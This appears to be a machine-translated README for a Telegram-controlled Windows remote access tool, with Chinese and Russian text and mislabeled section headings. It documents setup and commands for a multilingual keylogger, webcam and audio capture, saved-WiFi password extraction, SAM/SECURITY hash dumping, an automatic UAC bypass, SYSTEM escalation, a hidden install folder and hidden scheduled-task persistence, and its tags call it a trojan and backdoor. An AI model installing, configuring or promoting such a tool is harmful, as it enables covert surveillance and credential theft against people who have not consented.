vk-candpython/windows-telegram-bot

# 🤖 windows-telegram-bot ## ⚠️ 法律免责声明 **本软件仅供教育目的和授权的系统管理使用。** - ✅ **允许的用途**：管理您自己的设备，在获得明确书面同意的情况下进行渗透测试，教育研究 - ❌ **禁止的用途**：未经授权访问计算机系统，违反隐私法，任何非法活动 **作者对本软件的滥用不承担任何责任。** ## 📖 目录 | Оглавление - [英语](#english) - [📋 概述](#-overview) - [✨ 功能](#-features) - [🚀 快速入门](#-quick-start) - [📁 文件结构](#-file-structure) - [🔐 安全与加密](#-security--encryption) - [📚 命令参考](#-command-reference) - [⚙️ 配置](#️-configuration) - [🛡️ 持久化机制](#️-persistence-mechanisms) - [俄语](#русский) - [📋 Обзор](#-обзор) - [✨ Возможности](#-возможности) - [🚀 Быстрый старт](#-быстрый-старт) - [📁 Структура файлов](#-структура-файлов) - [🔐 Безопасность и шифрование](#-безопасность-и-шифрование) - [📚 Справочник команд](#-справочник-команд) - [⚙️ Конфигурация](#️-конфигурация) - [🛡️ Механизмы персистентности](#️-механизмы-персистентности) # 英语 ## 📋 概述 **Windows Telegram Bot** 是一款综合性的远程管理工具，可通过 Telegram messenger 提供**完整的系统控制**。 ### 主要功能 | 类别 | 功能 | |----------|-------------| | **系统控制** | 重启、关机、休眠、睡眠、注销、进程管理 | | **文件系统** | 浏览、上传、下载、创建、删除、隐藏、取消隐藏、压缩 | | **网络** | IP 配置、路由表、ARP 缓存、netstat、WiFi 扫描/密码 | | **注册表** | 完整的注册表访问（创建、读取、写入、删除、枚举键/值） | | **组策略** | 本地组策略管理（计算机/用户策略） | | **服务与任务** | Windows 服务和任务计划程序管理 | | **设备管理器** | 设备枚举、驱动安装/删除、启用/禁用/重启 | | **用户界面** | 截图、摄像头捕获、音频录制、鼠标/键盘控制 | | **监控** | 键盘记录器（支持 EN/RU/UA 多语言）、剪贴板监控 | | **持久化** | 服务、任务、启动项（注册表/文件夹）、环境变量 | | **安全** | 用户管理、应用程序拦截、网站拦截、哈希转储 (SAM/SECURITY) | | **信息** | 完整的系统信息（CPU、GPU、RAM、磁盘、电池、BIOS 等） | ## ✨ 功能 ### 核心功能 | 功能 | 描述 | |---------|-------------| | 🔐 **密码保护** | SHA256 密码哈希验证 | | 🔑 **会话管理** | 带有自动清理的加密用户会话 | | 🛡️ **管理员提权** | 通过 ShellExecute 自动绕过 UAC | | 🔄 **自我修复** | 从崩溃、文件损坏中自动恢复 | | 🎨 **彩色输出** | 通过 `tabulate` 实现格式化表格 | | 📄 **文件传输** | 上传/下载任意大小的文件 | | 🔒 **加密存储** | 所有敏感数据采用基于 XOR 的加密 | ### 系统命令 | 命令 | 描述 | |---------|-------------| | `systeminfo` | 完整的硬件/软件清单 | | `dxdiag` | DirectX 诊断信息 | | `device` | 设备管理器控制 | | `reg` | 注册表编辑器（创建/读取/写入/删除/枚举） | | `gpedit` | 本地组策略编辑器 | | `service` | Windows 服务管理 | | `task` | 任务计划程序管理 | | `startup` | 启动项管理 | | `app` | 已安装应用程序管理 | | `env` | 环境变量（计算机/用户/易失性） | | `lang` | 系统语言管理 | | `user` | 用户账户管理 | | `ps` | 带有 CPU/MEM 使用率的进程列表 | | `kill` | 终止进程 | | `run` | 启动应用程序/文件 | | `cmd` / `powershell` | 执行命令 | | `eventlog` | Windows 事件日志查看器 | | `time` / `date` | 获取/设置系统时间/日期 | | `logout` / `hibernate` / `sleep` / `reboot` / `shutdown` | 电源管理 | ### 注册表命令 ``` # 创建键 reg -c HKEY_LOCAL_MACHINE\SOFTWARE\MyApp -n Settings # 创建值 reg -c HKEY_LOCAL_MACHINE\SOFTWARE\MyApp -n Version -v "1.0" -t sz # 获取值 reg -g HKEY_LOCAL_MACHINE\SOFTWARE\MyApp -n Version # 枚举键 reg -e -k HKEY_LOCAL_MACHINE\SOFTWARE # 删除 reg -d -v HKEY_LOCAL_MACHINE\SOFTWARE\MyApp -n Version ``` ### 设备管理器命令 ``` # 列出所有设备 device -g # 查询设备 device -q "PCI\VEN_8086" # 安装驱动 device -i driver "C:\driver.inf" # 启用/禁用/重启 device -e "PCI\VEN_8086" device -d "PCI\VEN_8086" device -r "PCI\VEN_8086" # 删除设备/驱动 device -s device "PCI\VEN_8086" device -s driver "oem0.inf" # 更改设备信息（伪装） device -c device_name "PCI\VEN_8086" -n "New Name" device -c bios_vendor -n "Custom BIOS" ``` ### 用户界面命令 | 命令 | 描述 | |---------|-------------| | `screen` | 截图 (PNG) / 壁纸 / 开关屏幕 | | `webcam` | 摄像头捕获 | | `audio` | 录制/播放音频 | | `img` | 显示图片 | | `mouse` | 移动、点击、滚动、自定义光标 | | `keyboard` | 输入、按键、重映射、拦截、切换布局 | | `clipboard` | 读取/写入/清除剪贴板 | | `msg` | 显示通知/消息框 | | `keylogger` | 启用/禁用/检索击键记录 (EN/RU/UA) | ### 键盘记录器功能 - **多语言支持**：支持英语、俄语、乌克兰语键盘布局 - **智能解析**：处理 Ctrl+方向键单词跳转、Backspace/Delete - **输出模式**： - `base` - 带有热键标签的原始数据 - `char` - 仅字符 - `hotkey` - 带有热键标签 - `no hotkey` - 不带有热键标签 ## 🚀 快速入门 ### 📋 前置条件 - Windows 7/8/10/11 - Python 3.8+ - 管理员权限 ### 📥 安装 ``` git clone https://github.com/vk-candpython/windows-telegram-bot.git cd windows-telegram-bot pip install -r requirements.txt ``` ### ⚙️ 配置 编辑 `bot.py` 并设置： ``` #-------------------------|NECESSARILY|-------------------------# TOKEN = "YOUR_BOT_TOKEN" # From @BotFather PASSWORD = "YOUR_PASSWORD_HASH" # SHA256 of your password SEED = 12345 # Random seed for encryption PATH = "C:\\ProgramData\\MyBot" # Installation directory #-----------------------------|END|-----------------------------# #-------------------------|OPTIONAL|-------------------------# BOT_TASK_NAME = "MyBot" # Task Scheduler name BOT_TASK_DESCRIPTION = "My Bot" # Task description BOT_EXE = True # Run as persistent task #----------------------------|END|---------------------------# ``` ### 🔐 生成密码哈希 ``` python -c "from hashlib import sha256; print(sha256('YOUR_PASSWORD'.encode()).hexdigest())" ``` ### 🏃 运行 ``` # 以管理员身份 python bot.py ``` ## 📁 文件结构 ``` C:\ProgramData\MyBot\ # PATH (hidden) ├── bot.py # Main script ├── mem/ # Session storage │ └── {encrypted_user_id} # One file per verified user ├── sys/ # System files │ ├── config/ # Encrypted configs │ │ ├── 0x66f4777938a79111 # TOKEN (encrypted) │ │ ├── 0x7dc0a72554c7035d # PASSWORD (encrypted) │ │ └── 0x6e17263f779dce5a # SEED │ ├── 0x3b8f1289273df19c # Restart flag │ ├── 0x79f2d2686b6da01e # Autostart entries (encrypted) │ └── 0x2a47be6d04a14df5 # Keylogger flag ├── tmp/ # Temporary files │ ├── 0x1f95051e7493c896 # Blocked apps list │ └── 0x4b0944084a778666 # Keylogger data └── share/ # Uploaded/downloaded files ``` ## 🔐 安全与加密 **属性：** - 带有反馈的基于 XOR 的流密码 - 每个加密字节取决于位置、密钥和先前的状态 - 用于：TOKEN、PASSWORD、自启动项、会话、键盘记录器数据 ## 📚 命令参考 ### 核心命令 | 命令 | 描述 | |---------|-------------| | `help` | 显示所有命令 | | `session` | 会话信息 | | `getpid` | 当前 PID | | `getuid` | 当前用户 | | `getsystem` | 获取 SYSTEM 权限 | | `restart` | 重启 bot | | `exit` | 注销 | ### 文件系统示例 ``` # 列出目录 ls # 更改目录 cd C:\Users # 创建文件 mkfile test.txt -d "Hello\tWorld\n" # 隐藏文件 hide secret.txt # 下载文件 cat document.pdf # 打包当前目录 zip ``` ### 网络示例 ``` # 获取 IP 信息 ipconfig # 扫描 WiFi wifi -g # 获取已保存的 WiFi 密码 wifi -p # 屏蔽网站 site -b example.com ``` ### 注册表示例 ``` # 创建键 reg -c HKEY_CURRENT_USER\Software\MyApp -n Settings # 设置值 reg -c HKEY_CURRENT_USER\Software\MyApp -n Version -v "1.0" -t sz # 获取值 reg -g HKEY_CURRENT_USER\Software\MyApp -n Version # 枚举值 reg -e -v HKEY_CURRENT_USER\Software\MyApp ``` ### 服务示例 ``` # 列出服务 service -g # 创建服务 service -c MyService -n "My Service" -d "Description" -p C:\app.exe -a "arg1 arg2" -m autostart # 启动/停止 service -l MyService service -s MyService ``` ### 任务计划程序示例 ``` # 列出任务 task -g # 创建任务（开机运行） task -c system MyTask -d "Description" -p C:\script.bat -a none -h true -e startup # 创建任务（每分钟运行） task -c user MyTask -d "Description" -p C:\script.bat -a none -h true -e time ``` ### 用户界面示例 ``` # 屏幕截图 screen -s # 摄像头 webcam # 录制 10 秒 audio 10 # 移动鼠标 mouse -x 500 -y 300 -d 1 # 输入文本 keyboard -t "Hello" -d 1 # 将键盘布局设置为俄语 keyboard -s ru # 获取剪贴板 clipboard -g # 显示通知 msg -p "Title" -t "Message" ``` ### 键盘记录器示例 ``` # 启用 keylogger -e # 状态 keylogger -s # 获取数据（原始） keylogger -g base # 获取数据（仅字符） keylogger -g char # 禁用 keylogger -d ``` ## ⚙️ 配置 ### 运行时配置更改 ``` # 查看配置 config -g # 更改 TOKEN config TOKEN -s 1234567890:ABCdefGHIjklMNOpqrsTUVwxyz # 更改 PASSWORD config PASSWORD -s newpassword # 重置 TOKEN config -r TOKEN ``` ## 🛡️ 持久化机制 ### 1. 任务计划程序 (BOT_EXE=True) 创建每分钟运行一次的任务： - 用户：SYSTEM 或当前用户 - 隐藏：true - 优先级：最高 - 失败时重启 ### 2. 内部自启动 ``` autostart -c name -p C:\app.exe -a "args" -w true autostart -l autostart -d name ``` ### 3. Windows 启动项（注册表） ``` startup -c machine MyApp -p C:\app.exe -a none startup -g startup -d machine MyApp ``` ### 4. Windows 服务 ``` service -c MyService -n "Display" -d "Desc" -p C:\app.exe -a none -m autostart ``` # Русский ## 📋 概述 **Windows Telegram Bot** — это комплексный инструмент удалённого администрирования, предоставляющий **полный контроль над системой** Windows через мессенджер Telegram. ### 核心功能 | Категория | Возможности | |-----------|-------------| | **Управление системой** | Перезагрузка, выключение, гибернация, сон, выход, управление процессами | | **Файловая система** | Навигация, загрузка, скачивание, создание, удаление, скрытие, архивация | | **Сеть** | IP-конфигурация, таблицы маршрутизации, ARP-кэш, netstat, WiFi | | **Реестр** | Полный доступ к реестру (создание, чтение, запись, удаление, перечисление) | | **Групповые политики** | Управление локальными политиками (machine/user) | | **Службы и задачи** | Управление службами Windows и Планировщиком задач | | **Диспетчер устройств** | Перечисление устройств, установка/удаление драйверов, вкл/выкл/перезапуск | | **Интерфейс** | Скриншоты, веб-камера, запись звука, мышь/клавиатура | | **Наблюдение** | Кейлоггер (многоязычный EN/RU/UA), мониторинг буфера обмена | | **Персистентность** | Службы, задачи, автозагрузка, переменные окружения | | **Безопасность** | Управление пользователями, блокировка приложений/сайтов, дамп хешей | ## ✨ 功能 ### 主要功能 | Возможность | Описание | |-------------|----------| | 🔐 **Защита паролем** | Проверка SHA256 хеша пароля | | 🔑 **Управление сессиями** | Зашифрованные файлы сессий | | 🛡️ **Повышение прав** | Автоматический UAC bypass через ShellExecute | | 🔄 **Самовосстановление** | Автовосстановление после сбоев | | 🔒 **Шифрованное хранение** | XOR-шифрование чувствительных данных | ## 🚀 快速入门 ### 📋 要求 - Windows 7/8/10/11 - Python 3.8+ - Права администратора ### 📥 安装 ``` git clone https://github.com/vk-candpython/windows-telegram-bot.git cd windows-telegram-bot pip install -r requirements.txt ``` ### ⚙️ 配置 Отредактируй `bot.py`: ``` TOKEN = "ТВОЙ_ТОКЕН_БОТА" # От @BotFather PASSWORD = "ХЕШ_ПАРОЛЯ" # SHA256 твоего пароля SEED = 12345 # Зерно для шифрования PATH = "C:\\ProgramData\\MyBot" # Директория установки ``` ### 🏃 运行 ``` python bot.py ``` ## 📚 命令参考 ### 注册表 ``` # 创建键 reg -c HKEY_CURRENT_USER\Software\MyApp -n Settings # 设置值 reg -c HKEY_CURRENT_USER\Software\MyApp -n Version -v "1.0" -t sz # 获取值 reg -g HKEY_CURRENT_USER\Software\MyApp -n Version # 删除 reg -d -v HKEY_CURRENT_USER\Software\MyApp -n Version ``` ### 设备 ``` # 设备列表 device -g # 设备信息 device -q "PCI\VEN_8086" # 开启/关闭 device -e "PCI\VEN_8086" device -d "PCI\VEN_8086" # 更改信息（伪装） device -c device_name "PCI\VEN_8086" -n "Новое имя" ``` ### 键盘记录器 ``` # 启用 keylogger -e # 状态 keylogger -s # 获取数据（仅字符） keylogger -g char # 关闭 keylogger -d ```

标签：Awesome, Python, RAT, Telegram, 僵尸网络, 加密通信, 后门, 命令与控制, 嗅探欺骗, 数据展示, 文件传输, 无后门, 权限维持, 端点可见性, 系统管理, 红队, 终端访问, 网络信息收集, 网络安全, 远控木马, 远程管理, 隐私保护, 隐蔽控制, 黑产